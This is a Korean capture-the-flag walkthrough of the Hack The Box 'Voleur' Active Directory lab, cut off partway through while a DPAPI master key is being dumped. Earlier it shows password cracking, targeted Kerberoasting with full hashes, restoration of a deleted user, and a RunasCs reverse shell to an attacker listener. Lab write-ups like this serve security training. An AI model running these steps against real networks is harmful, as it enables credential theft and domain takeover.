Summary
HTB Voleur 머신은 Medium 난이도의 Windows 머신입니다.
- 초기 정찰 및 접근 (Reconnaissance):
- NTLM이 비활성화된 환경에 맞춰 Kerberos 설정을 마친 후 네트워크 열거를 수행했습니다.
- 노출된 SMB 공유에서 암호가 걸린 Excel 파일을 발견하고, 해시 추출 및 크랙 과정을 통해 파일 내부의 정보를 확보했습니다.
- AD 권한 상승 (Privilege Escalation):
- WriteSPN 권한을 가진 서비스 계정을 식별했습니다. 이를 통해 Targeted Kerberoasting 공격을 수행하여 자격 증명을 탈취하고, 호스트에 대한 원격 접속 권한을 얻었습니다.
- 계정 복구 및 DPAPI 복호화:
- 그룹 권한을 악용해 이전에 삭제된 도메인 사용자를 복원했습니다.
- 해당 사용자의 비밀번호를 이용해 DPAPI로 보호된 Credential Blob을 복호화함으로써,타 사용자의 계정 정보를 획득했습니다.
- 최종 시스템 장악 (Domain Compromise):
- 백업 서비스 계정의 SSH 개인 키를 발견하여, 비표준 포트(TCP/2222)로 운영 중인 Linux 서브시스템(WSL)에 접근했습니다.
- 해당 시스템에서 NTDS.dit, SYSTEM, SECURITY 백업 파일을 추출했습니다.
- 최종적으로 Administrator의 NT 해시를 복구하여 도메인 관리자 권한을 획득했습니다.
초기 접근 및 정찰
ryan.naylor / HollowOct31Nyt 초기 계정을 제공했습니다.
└─$ ports=$(sudo nmap -p- -sS -n --open -Pn --min-rate=1500 -T4 10.129.232.130 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
└─$ nmap -p$ports -Pn -sV -sC 10.129.232.130 -oA tcpDetailed
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-02 01:34 PST
Nmap scan report for voleur.htb (10.129.232.130)
Host is up (0.22s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-02 17:36:15Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
| 256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
|_ 256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
52851/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
52852/tcp open msrpc Microsoft Windows RPC
52853/tcp open msrpc Microsoft Windows RPC
52880/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-01-02T17:37:08
|_ start_date: N/A
|_clock-skew: 8h01m32s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.19 seconds
```
포트 스캔 결과 전형적인 Active Directory 머신임을 확인할 수 있습니다. 특이한 점은 2222/tcp에 OpenSSH가 존재합니다. 도메인 명은 voleur.htb입니다.
SMB(445)
제공된 계정을 통해 smb 프로토콜에 접근을 시도했습니다.
└─$ nxc smb 10.129.232.130 -u ryan.naylor -p 'HollowOct31Nyt'
SMB 10.129.232.130 445 10.129.232.130 [*] x64 (name:10.129.232.130) (domain:10.129.232.130) (signing:True) (SMBv1:False) (NTLM:False)
SMB 10.129.232.130 445 10.129.232.130 [-] 10.129.232.130\ryan.naylor:HollowOct31Nyt STATUS_NOT_SUPPORTED
```
`STATUS_NOT_SUPPORTED` 오류가 발생했습니다. 대상 서버(10.129.232.130)에서는 NTLM 프로토콜을 통한 인증을 거부하고 있습니다. nxc 명령은 기본적으로 NTLM 방식을 통해 인증을 시도하기 때문에 해당 방식이 서버에서 지원하지 않는다고 오류가 발생한 것입니다.
진행하기에 앞서, /etc/krb5.conf 내 내용 업데이트를 통해 서버 측 도메인 컨트롤러(DC)와 동기화를 시도했습니다.
└─$ echo '10.129.232.130 DC.voleur.htb voleur.htb' | sudo tee -a /etc/hosts
10.129.232.130 DC.voleur.htb voleur.htb
/etc/krb5.conf 파일은 로컬 머신이 Kerberos 인증을 수행할 때 어떤 도메인(Realm)의 인증 서버(KDC)가 어디(IP)에 있는지 알려주는 지도 역할을 합니다.
└─$ cat /etc/krb5.conf
[libdefaults]
default_realm = VOLEUR.HTB
dns_lookup_kdc = false
[realms]
VOLEUR.HTB = {
kdc = DC.voleur.htb
default_domain = voleur.htb
}
이제 다시 명령어를 실행해봅니다.
└─$ nxc smb dc.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k
SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc.voleur.htb 445 dc [-] voleur.htb\ryan.naylor:HollowOct31Nyt KRB_AP_ERR_SKEW
`KRB_AP_ERR_SKEW` 오류는 내 컴퓨터와 대상 서버의 시간이 서로 맞지 않아서 발생합니다. Kerberos 인증은 티켓 기반으로 동작하는데, 재사용 공격을 막기 위해 서버 간 5분 이상 차이가 나면 인증을 거부합니다. 아래와 같은 명령어를 통해 시간 동기화를 진행하면 문제가 해결됩니다.
└─$ sudo ntpdate -u DC.voleur.htb
2026-01-02 10:54:51.282829 (-0800) +28892.174075 +/- 0.107687 DC.voleur.htb 10.129.232.130 s1 no-leap
CLOCK: time stepped by 28892.174075
다시 최종적으로 명령어를 실행합니다.
└─$ nxc smb dc.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k
SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc.voleur.htb 445 dc [+] voleur.htb\ryan.naylor:HollowOct31Nyt
SMB Shares
└─$ nxc smb dc.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k --shares
SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc.voleur.htb 445 dc [+] voleur.htb\ryan.naylor:HollowOct31Nyt
SMB dc.voleur.htb 445 dc [*] Enumerated shares
SMB dc.voleur.htb 445 dc Share Permissions Remark
SMB dc.voleur.htb 445 dc ----- ----------- ------
SMB dc.voleur.htb 445 dc ADMIN$ Remote Admin
SMB dc.voleur.htb 445 dc C$ Default share
SMB dc.voleur.htb 445 dc Finance
SMB dc.voleur.htb 445 dc HR
SMB dc.voleur.htb 445 dc IPC$ READ Remote IPC
SMB dc.voleur.htb 445 dc IT READ
SMB dc.voleur.htb 445 dc NETLOGON READ Logon server share
SMB dc.voleur.htb 445 dc SYSVOL READ Logon server share
기본 공유 폴더를 제외하고 IT라는 폴더에 READ 권한이 있음을 확인했습니다. 해당 디렉터리 내 어떤 파일이 있는지 확인해보겠습니다.
└─$ nxc smb dc.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k --spider IT --pattern .
SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc.voleur.htb 445 dc [+] voleur.htb\ryan.naylor:HollowOct31Nyt
SMB dc.voleur.htb 445 dc [*] Started spidering
SMB dc.voleur.htb 445 dc [*] Spidering .
SMB dc.voleur.htb 445 dc //dc.voleur.htb/IT/. [dir]
SMB dc.voleur.htb 445 dc //dc.voleur.htb/IT/.. [dir]
SMB dc.voleur.htb 445 dc //dc.voleur.htb/IT/First-Line Support/. [dir]
SMB dc.voleur.htb 445 dc //dc.voleur.htb/IT/First-Line Support/.. [dir]
SMB dc.voleur.htb 445 dc //dc.voleur.htb/IT/First-Line Support/Access_Review.xlsx [lastm:'2025-05-29 15:23' size:16896]
SMB dc.voleur.htb 445 dc [*] Done spidering (Completed in 2.5153794288635254)
Access_Review.xlsx 파일을 발견했고 다운로드 후 확인해보겠습니다.
└─$ nxc smb DC.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k -d voleur.htb --share IT --get-file 'First-Line Support/Access_Review.xlsx' Access_Review.xlsx
SMB DC.voleur.htb 445 DC [*] x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC.voleur.htb 445 DC [+] voleur.htb\ryan.naylor:HollowOct31Nyt
SMB DC.voleur.htb 445 DC [*] Copying "First-Line Support/Access_Review.xlsx" to "Access_Review.xlsx"
SMB DC.voleur.htb 445 DC [+] File "First-Line Support/Access_Review.xlsx" was downloaded to "Access_Review.xlsx"
└─$ file Access_Review.xlsx
Access_Review.xlsx: CDFV2 Encrypted
CDFV2 Encrypted는 Microsoft Office 문서의 암호화 형식입니다. 현재 파일은 비밀번호로 보호되어 있다는 것을 알 수 있습니다.
└─$ office2john Access_Review.xlsx | cut -d: -f2 > hash.txt
└─$ hashcat -m 9600 hash.txt /usr/share/wordlists/rockyou.txt
$office$*2013*100000*256*16*a80811402788c037b50df976864b33f5*500bd7e833dffaa28772a49e987be35b*7ec993c47ef39a61e86f8273536decc7d525691345004092482f9fd59cfa111c:football1
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 9600 (MS Office 2013)
Hash.Target......: $office$*2013*100000*256*16*a80811402788c037b50df97...fa111c
Time.Started.....: Fri Jan 2 11:38:40 2026 (2 secs)
Time.Estimated...: Fri Jan 2 11:38:42 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 471 H/s (12.05ms) @ Accel:141 Loops:1000 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 846/14344388 (0.01%)
Rejected.........: 0/846 (0.00%)
Restore.Point....: 0/14344388 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: 123456 -> xxxxxx
Hardware.Mon.#01.: Util: 90%
Started: Fri Jan 2 11:38:12 2026
Stopped: Fri Jan 2 11:38:44 2026
확인한 계정 정보를 netexec 명령어를 통해 SMB 프로토콜로 로그인을 시도해봅니다.
└─$ nxc smb DC.voleur.htb -u users.txt -p passwords.txt --continue-on-success -k
SMB DC.voleur.htb 445 DC [+] voleur.htb\svc_iis:N5pXyW1VqM7CZ8
SMB DC.voleur.htb 445 DC [+] voleur.htb\svc_ldap:M1XyC9pW7qT5Vn
두 계정(svc_iis, svc_ldap)을 찾을 수 있었습니다. 이후 Bloodhound를 통해 권한을 확인해보겠습니다.
└─$ bloodhound-python -d voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -c all --zip -ns 10.129.232.130
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: voleur.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.voleur.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.voleur.htb
INFO: Found 12 users
INFO: Found 56 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.voleur.htb
INFO: Done in 00M 43S
INFO: Compressing output into 20260102133401_bloodhound.zip
svc_ldap 계정으로부터 svc_winrm 계정에 대해 WriteSPN 권한을 가지고 있습니다.
svc_ldap → svc_winrm
공격단계
WriteSPN권한을 가진 계정을 통해 임의의 SPN(Service Principal Name)을 추가합니다.- SPN 설정되면 해당 계정의 서비스 티켓(TGS)을 요청할 수 있습니다.
- 요청한 TGS를 오프라인 크래킹을 진행합니다.
- 크랙 성공 시 평문 비밀번호를 획득할 수 있습니다.
└─$ impacket-getTGT -dc-ip 10.129.232.130 voleur.htb/svc_ldap
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Saving ticket in svc_ldap.ccache
└─$ export KRB5CCNAME=svc_ldap.ccache
└─$ klist
Ticket cache: FILE:svc_ldap.ccache
Default principal: svc_ldap@VOLEUR.HTB
Valid starting Expires Service principal
01/02/2026 13:46:19 01/02/2026 23:46:19 krbtgt/VOLEUR.HTB@VOLEUR.HTB
renew until 01/03/2026 13:46:19
svc_ldap 계정의 티켓을 획득한 뒤 targetedKerberoasting 공격 기법을 사용합니다. 해당 공격 기법을 통해 SPN이 설정되지 않은 일반 사용자 계정에게 강제로 SPN을 할당하며 TGS 티켓을 요청합니다. 여기서 대상 계정의 속성을 수정할 수 있는 권한이 필요합니다.
└─$ targetedKerberoast.py -d voleur.htb --dc-host DC.voleur.htb -u svc_ldap@voleur.htb -k
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (lacey.miller)
$krb5tgs$23$*lacey.miller$VOLEUR.HTB$voleur.htb/lacey.miller*$59a7b8fbab1efc52d43f2836029c93d2$d7913831a2aed219cba75acea982d96273cb693f1e9a6ea0e4a3dba7805723b981708f06359b40fca1de830f456ef23c24ff0b30572930fef1a090da2a1f28082730e2eb69e6937365cc23a028080a616ecff88261d6141ff77e3a5cb512029f06e50bff439e8dea2029f34bb3eb10fa589bab1c871c27223bff1b04b7b223de7f8d7d8afd617939a76d20cd0a8ff80b5d848c78e01f21ad4b4add5d9a07e5bc327de5dc2d9f9875a6d0b4cb574a452d484f1ccf9341498b00ebbfeb847b29ffff9a83d5d764e7e71873d356605821ef3b12db763f4bdb361381655a59d069fcea5d90828692de0822e19543418084cad91537677f41c5dfba69153e442950428c489942ee1a0ad1e5d4856bfcd28f4806428ac66f10d6aca6533d70399fb8d5da3ce7a9ba70899767c8c71eb243638b55b208ead4bffcd4aaeebdbf91c8feaf9dbb0e33239ca2b0500df6d591dc2b57da989c74be1898f66f24730496733a70972c3588f0558304cad3fd5494d70a3097cf0d5617ab80b36f1a57a5a498fe8d90e12957d903a3dac9a85ab101be009999eb81d38e88c9137bc51e4654c746cf6d41887fcf3f7b9b6c797d787f4f35d3a0562a2feaffca6359c70af1870160c3dbb16d2f40051b13c1e6fccd5f873cc82ae79ea94d24a415358db3d5974561fe4e7e2258b747ffea2b61ba88b2b96454bac74a9889953da05a98a39b0cd1239b3a6d7e4b3e467df155052cb59910cecd98870dda9b71b8f65a3db86e40cc45fd2d55c3c13679c13591cb78a19be3169246390d11f23eadd3c12ef496e3400f79c2dbdbe882af52c416002685bd8620b7f02341ef02a145f6a9a2045cd0dfc6848c453de0f291aca288072d39abe9c9d746921d9688d31c19e6cc463353b1779f9a2d0b293dd97efd9ba0633eb909018ecf549876c9c3b9219cbc0ec4913574dc25398159398d869ce0ec921b226564b212eeab2948312a6d52c1de0aa14b1dbcbc23503be474851c0ceced1fbf490b516192264106d0654d0bc33862e04256e8e46cf1baabe33ccdd01431df73ac204ce950333fc8c6487bc7342af7a31a3f56ee9f2d0e83145b5434d5421a8b82ad4decffe5631776a774549b44bee8dc1557cc06c3f8dc3877f739ec11a735cc06011c4e6a1a743e111b5e03a404e1dfaaf3ca173bd62e1275aaed2d67c20ffcdc228b9a727abfd36815069b88c0454b9c64d9c44387be7c8b90062384a5abdd955923f7eec365840a5fa77ddbc2d8005c4afe69b8e35e5eec6d452193ca0ff21b24ed5165b628d473c6b3a73b5d4870c30e9a5c1f5e441291a3e0b59754154345b20744092ef726ce5274e09412c6a6d17f0c1c5c27ad4833389968373188a59440f6170ad055769d14dafbdb5a7dffc2c278e07deb8ca03d2967f5e1826870861ea8db394baa141a8f38b9ef42063fd5309777046e39078ac396ce23453d3fb7ddabf871
[+] Printing hash for (svc_winrm)
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$d9020a994c399e37cd9b3090e6704d60$3075f97deecc12fdd8637f33c699dea471940d47029399109a86a42dc6c649972cff2fed4bda6611d739dc865d9e0652e82322449cb31bb61b3644d28c16c918a5e7b8363cef1a620bf24fb166a83abeeed3b70a67779d4ede1e880de0d9c373065119a7fe928aab722cf589c08098eb043ee0699ba17be84c6d1ca27837bb59301f45864ef6f15f395d478a6c6dbeb56c328c6ab639bd29e5ab464cc161ec97c17b1cf2318b86e9c6515707c4cc423fad7a3170fe0ab0d87ac7da585fa55aae664f7bc2bbcbdd09c55d81557ee2878442a3691feb2b70b75fdaa21363f34c82c90cb1f0d6b0a5930a82bfdd4c91a07470857ae58ad44868573ba27f057276a7a90c0771eea765f704b5bfedcc623d1c3d173d38cbbcaee4c6793b4377eba79be118417fdc3108ea4aa63ab269a90c60c78562e1d1b277c21855dcc2b677ea01d2428b0c4357b0d39c7658628c6387b18e041b158aacd78cdc4928eddb5e98c23f7ffd8199089ca33d366da45cf81c0428d6787af3fd58500996db8221da2000e0a517aaed4e0b96e4209180895225c4f6f6f85388aa72704f10c0fa0f543b22dc55738dc2dac83c143792b09af49ce285d52918774a931c73cb996737108dcc2d23eaa9af1dd04d43b668a65be8708242a1cf3b83588f63e520c4413062fe1c727e0c5624b7250ba3a080f0c5ab9fee2a11e1c307a72d7fea8237ea8371521cbee1e8610a3bab108365c55d40fd30c6249b2a93c1cb55776ee3c34549885eb0a368021a96ae6bf99f64fca236c2a484899ef3cf9bd8288039ea9d39ba51dd5a3277c04df2c49a4f5cdc393a03ef97a8ebad7d95499399f52a1bef46e59e24cb322cb0e50f22f57ed025beaf9a48db2263c5452ee1ca57b27ddd2596b79ec38d8c61dfdec15970fd28f74e2244707e42ac01cb0fe81354840720037e506f5341a83d6b91bb8eb11b83e959abd8f02047b2101b98eb7b2e56383a1b0338c457e443fb9e4c2afb8a198e8aadbc5626edb5dcbc2e021e19b3b893e680c8ab172e093a8ed279d077aa64a19bddce3d369e3cbc7351a4102ccd4c27cf82087241ec87675844f8534d0e6981ae0d42318fcb178f0c2b6efd59320bed36eaf9e46830815dc5ddbb604b48469c371eef649d99d6bc780cb3904bcda02ee1356990561c7765e91640839fdf4ee7a301661c7387226aedf063c9a09c5ec48ec37571c53ef7e68a3a7c612bc4547c8beef7e8d5a1fdc155dfe1136827176559f67829c5d355a53a5c84f9d194377d93f56f6c5018a8c0979251fa39226351502bc025109582e11c01ab6e1d422ac72608f233306506dec0815cd9c1d6ac1b78e0779a5f62c8ee1134734c233128d0c7d701ee6f52c85acf41a02c8615f7a312d8d601c8480c1cc7193c24acd0cf06d06269c2632e247efb571fbe196565d1b66e7f810af6dc67529cb173a55d408d49008765923b1623ee98
svc_winrm과 lacey.miller 계정의 해시 값이 나옵니다.
오프라인 크래킹
└─$ hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*svc_winrm$VOLEUR.HTB$voleur.htb/svc_winrm*$d9020a994c399e37cd9b3090e6704d60$3075f97deecc12fdd8637f33c699dea471940d47029399109a86a42dc6c649972cff2fed4bda6611d739dc865d9e0652e82322449cb31bb61b3644d28c16c918a5e7b8363cef1a620bf24fb166a83abeeed3b70a67779d4ede1e880de0d9c373065119a7fe928aab722cf589c08098eb043ee0699ba17be84c6d1ca27837bb59301f45864ef6f15f395d478a6c6dbeb56c328c6ab639bd29e5ab464cc161ec97c17b1cf2318b86e9c6515707c4cc423fad7a3170fe0ab0d87ac7da585fa55aae664f7bc2bbcbdd09c55d81557ee2878442a3691feb2b70b75fdaa21363f34c82c90cb1f0d6b0a5930a82bfdd4c91a07470857ae58ad44868573ba27f057276a7a90c0771eea765f704b5bfedcc623d1c3d173d38cbbcaee4c6793b4377eba79be118417fdc3108ea4aa63ab269a90c60c78562e1d1b277c21855dcc2b677ea01d2428b0c4357b0d39c7658628c6387b18e041b158aacd78cdc4928eddb5e98c23f7ffd8199089ca33d366da45cf81c0428d6787af3fd58500996db8221da2000e0a517aaed4e0b96e4209180895225c4f6f6f85388aa72704f10c0fa0f543b22dc55738dc2dac83c143792b09af49ce285d52918774a931c73cb996737108dcc2d23eaa9af1dd04d43b668a65be8708242a1cf3b83588f63e520c4413062fe1c727e0c5624b7250ba3a080f0c5ab9fee2a11e1c307a72d7fea8237ea8371521cbee1e8610a3bab108365c55d40fd30c6249b2a93c1cb55776ee3c34549885eb0a368021a96ae6bf99f64fca236c2a484899ef3cf9bd8288039ea9d39ba51dd5a3277c04df2c49a4f5cdc393a03ef97a8ebad7d95499399f52a1bef46e59e24cb322cb0e50f22f57ed025beaf9a48db2263c5452ee1ca57b27ddd2596b79ec38d8c61dfdec15970fd28f74e2244707e42ac01cb0fe81354840720037e506f5341a83d6b91bb8eb11b83e959abd8f02047b2101b98eb7b2e56383a1b0338c457e443fb9e4c2afb8a198e8aadbc5626edb5dcbc2e021e19b3b893e680c8ab172e093a8ed279d077aa64a19bddce3d369e3cbc7351a4102ccd4c27cf82087241ec87675844f8534d0e6981ae0d42318fcb178f0c2b6efd59320bed36eaf9e46830815dc5ddbb604b48469c371eef649d99d6bc780cb3904bcda02ee1356990561c7765e91640839fdf4ee7a301661c7387226aedf063c9a09c5ec48ec37571c53ef7e68a3a7c612bc4547c8beef7e8d5a1fdc155dfe1136827176559f67829c5d355a53a5c84f9d194377d93f56f6c5018a8c0979251fa39226351502bc025109582e11c01ab6e1d422ac72608f233306506dec0815cd9c1d6ac1b78e0779a5f62c8ee1134734c233128d0c7d701ee6f52c85acf41a02c8615f7a312d8d601c8480c1cc7193c24acd0cf06d06269c2632e247efb571fbe196565d1b66e7f810af6dc67529cb173a55d408d49008765923b1623ee98:AFireInsidedeOzarctica980219afi
`svc_winrm:AFireInsidedeOzarctica980219afi' 계정 정보를 확인했습니다.
└─$ impacket-getTGT -dc-ip 10.129.232.130 voleur.htb/svc_winrm
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Saving ticket in svc_winrm.ccache
└─$ export KRB5CCNAME=svc_winrm.ccache
└─$ klist
Ticket cache: FILE:svc_winrm.ccache
Default principal: svc_winrm@VOLEUR.HTB
Valid starting Expires Service principal
01/02/2026 13:55:02 01/02/2026 23:55:02 krbtgt/VOLEUR.HTB@VOLEUR.HTB
renew until 01/03/2026 13:55:01
svc_winrm은 REMOTE MANAGEMENT USERS 그룹이므로 Winrm으로 접속을 시도해봅니다.
└─$ evil-winrm -i DC.voleur.htb -r VOLEUR.HTB -u svc_winrm
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: User is not needed for Kerberos auth. Ticket will be used
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_winrm\Documents> whoami
voleur\svc_winrm
생각해보면 svc_ldap 계정은 RESTORE_USERS 그룹에 속해있는 구성원이였습니다.
*Evil-WinRM* PS C:\Users\svc_winrm\Desktop> upload RunasCs.exe
Info: Uploading /home/kali/Desktop/HTB/Voleur/RunasCs.exe to C:\Users\svc_winrm\Desktop\RunasCs.exe
Data: 68948 bytes of 68948 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_winrm\Desktop> ./RunasCs.exe svc_ldap M1XyC9pW7qT5Vn "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command Get-ADObject -Filter 'isDeleted -eq `$true' -IncludeDeletedObjects -Properties distinguishedName, objectSid -SearchBase 'CN=Deleted Objects,DC=voleur,DC=htb'"
[*] Warning: The logon for user 'svc_ldap' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
Deleted : True
DistinguishedName : CN=Deleted Objects,DC=voleur,DC=htb
Name : Deleted Objects
ObjectClass : container
ObjectGUID : 587cd8b4-6f6a-46d9-8bd4-8fb31d2e18d8
Deleted : True
DistinguishedName : CN=Todd Wolfe\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Objects,DC=voleur,DC=htb
Name : Todd Wolfe
DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
ObjectClass : user
ObjectGUID : 1c6b1deb-c372-4cbb-87b1-15031de169db
objectSid : S-1-5-21-3927696377-1337352550-2781715495-1110
실제로 Todd Wolfe 계정이 삭제된 것을 Deleted Objects에 속한 것으로 확인했습니다. 이제 이 계정을 복원해보겠습니다.
./RunasCs.exe svc_ldap M1XyC9pW7qT5Vn "powershell.exe -c Get-ADObject -Filter 'ObjectGUID -eq ''1c6b1deb-c372-4cbb-87b1-15031de169db''' -IncludeDeletedObjects -Properties lastKnownParent" -l 8
*Evil-WinRM* PS C:\Users\svc_winrm\Desktop> ./RunasCs.exe svc_ldap M1XyC9pW7qT5Vn "powershell.exe -c Get-ADUser -Identity '1c6b1deb-c372-4cbb-87b1-15031de169db' -Properties *" -l 8
...
Deleted :
Department :
Description : Second-Line Support Technician
DisplayName : Todd Wolfe
DistinguishedName : CN=Todd Wolfe,OU=Second-Line Support Technicians,DC=voleur,DC=htb
isDeleted :
KerberosEncryptionType : {}
...
계정이 복원된 것을 확인할 수 있습니다.
Shell
*Evil-WinRM* PS C:\Users\svc_winrm\Desktop> .\RunasCs.exe todd.wolfe NightT1meP1dg3on14 powershell -r 10.10.14.13:4444
[*] Warning: The logon for user 'todd.wolfe' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-58d39b$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 4240 created in background.
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.13] from (UNKNOWN) [10.129.232.130] 51230
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> whoami
whoami
voleur\todd.wolfe
todd.wolfe 계정은 SECOND-LINE SUPPORT TECHNICIAN 그룹에 속해있습니다.
Lateral Movement(todd.wolfe → jeremy.combs)
AppData\Roaming\Microsoft\Credentials 디렉터리는 윈도우 운영체제에서 자격 증명을 암호화하여 저장하고 있습니다.
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials> dir
dir
Directory: C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/29/2025 4:55 AM 398 772275FAD58525253490A9B0039791D3
DPAPI는 윈도우 운영체제에 내장된 암호화 시스템입니다. 자격 증명을 복호화하기 위해 두 개의 파일이 필요합니다.
- Master key
- 위치: C:\Users\<사용자명>\AppData\Roaming\Microsoft\Protect\<SID>\
- 파일명: UUID 형식
- 자격 증명 파일
- 위치: C:\Users\<사용자명>\AppData\Roaming\Microsoft\Credentials\
- 파일명: 32자리 16진수 문자열
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Protect\S-1-5-21-3927696377-1337352550-2781715495-1110> [Convert]::ToBase64String([IO.File]::ReadAllBytes("$PWD\08949382-134f-4c63-b93c-ce52efc0aa88"))
[Convert]::ToBase64String([IO.File]::ReadAllBytes("$PWD\08949382-134f-4c63-b93c-ce52efc0aa88"))
AgAAAAAAAAAAAAAAMAA4ADkANAA5ADMAOAAyAC0AMQAzADQAZgAtADQAYwA2ADMALQBiADkAMwBjAC0AYwBlADUAMgBlAGYAYwAwAGEAYQA4ADgAAAAAAAAAAAAAAAAAiAAAAAAAAABoAAAAAAAAAAAAAAAAAAAAdAEAAAAAAAACAAAASAWcret5vHz2ZFDJGrnZI1BGAAAJgAAAA2YAAANcj1B/jylUhNcSe+UibSS+B7/bdiHKg/fYSD6cibplaMd3Y4zsjKqsVTKcNtLlcdFUHq1DuFNs3RIWP+bmweMuDU8cufImoeLTlQpIYdMh+W9gPmEl8K4uE7aQE3Yw5XcATlxytrmIAgAAAB7vnBVPlWNLbxgEAtZNEf5QRgAACYAAAANmAABK1OOpu3KshUr3dLNdcY8yUp0/QCvW9RyADda8JEaf/e2Qbn8XnQuQPb/7LENveEXSO4R2DsxXLXCs4ban1JazinCCqkvrWW0CAAAAAAEAAFgAAACEizqYyco/TqsQ3rgf7i9DSOaEVnONX4KQQG5p9lFlW0/lt1Tnj0do7kUF1rtUFAHLJCLhNsUpKRlyquQSSM0FnaIPoACBXWAUQ8P1KLfVosXGHH5zx9BwP8S+SjguDL3ipMNTWgTbAxzMB6wei02C/GjW4TTqZz6d/ENfJi79Quwp48np4xmtDOMKfNBKdPGdHIBSeJBJ90SpBN/sFHoveguRpfGmcJVpE4P/2yZWHcHSlTXxx1bF2GR/N32eLVzlDW8U0jiqZXz+GAxZPJcXVZzcwJCnQ86b5WV9YBrXq3d5gyGPGWgx3cryZPMR+03CQtT41lxN4CfgfD59crbmN5sMZCp6KG5RyRs3J1k0BXwLy8Ri33WwYhOUCCi9pSj1y3vvwqmAV4v1UydH0PXPlH+39e2oB2487UTGG